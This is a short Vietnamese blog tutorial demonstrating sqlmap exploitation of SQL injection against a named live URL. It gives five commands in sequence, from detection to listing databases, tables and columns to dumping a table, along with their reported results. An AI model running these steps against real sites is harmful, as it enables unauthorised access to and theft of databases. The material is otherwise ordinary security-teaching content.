Tool python khai thác SQL và một số tools khác

Một số tool khai thác

Hiện nay có rất nhiều công cụ quét lỗ hổng bảo mật (bao gồm SQL injection). Những công cụ này cho phép phát hiện vào khai thác lỗ hổng SQL injection khá mạnh mẽ. Một số công cụ khai thác lỗ hổng SQL injection tự động hay được sử dụng như:Dưới đây tôi sẽ demo việc sử dụng Sqlmap để khai thác SQL injection cơ bản.
Bạn download Sqlmap tại http://sqlmap.org/
Sqlmap được viết bằng ngôn ngữ Python, vì vậy để sử dụng tool này bạn cần cài đặt Python. Bạn có thể download python tạihttp://www.python.org/downloads/
Đầu tiên bạn phải xác định được website mục tiêu, ở đây tôi có mục tiêu sau:
http://zerocoolhf.altervista.org/level1.php?id=1

Bước 1: Mở cmd và gõ lệnh như sau:
Mã:
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1”
sqlmap sẽ phát hiện lỗ hổng của mục tiêu vào đưa ra thông tin về lỗ hổng.

Bước 2: Khi đã xác định được là website mục tiêu tồn tại lỗ hổng SQL injection, ta tiến hành tìm tên cơ sở dữ liệu.
Mã:
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --dbs

=>Cơ sở dữ liệu: my_zerocoolhf

Bước 3: Sau khi xác định được tên cơ sở dữ liệu, ta sẽ tìm tiếp tên các bảng có trong cơ sở dữ liệu.
Mã:
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --tables –D my_zerocoolhf

=> Có 2 bảng trong cơ sở dữ liệu: auth và book

Bước 4: Xác định tên các cột trong bảng
Mã:
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --columns –D my_zerocoolhf –T book


=> Xác định được các cột trong bảng book: author, id, price, title.

Bước 5:
 Dump dữ liệu từ bảng.

Mã:
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --dump –D my_zerocoolhf –T book


=> Như vậy ta đã lấy được cơ sở dữ liệu của website mục tiêu.

Trên đây là demo cơ bản về sử dụng sqlmap để khai thác lỗi SQL injection, các bạn có thể tìm hiểu thêm các tùy chọn của sqlmap tạihttps://github.com/sqlmapproject/sqlmap/wiki/Usage để hỗ trợ việc khai thác SQL injection.
Tool python khai thác SQL và một số tools khác Tool python khai thác SQL và một số tools khác Reviewed by tiền hình con khỉ on 06:56 Rating: 5

Không có nhận xét nào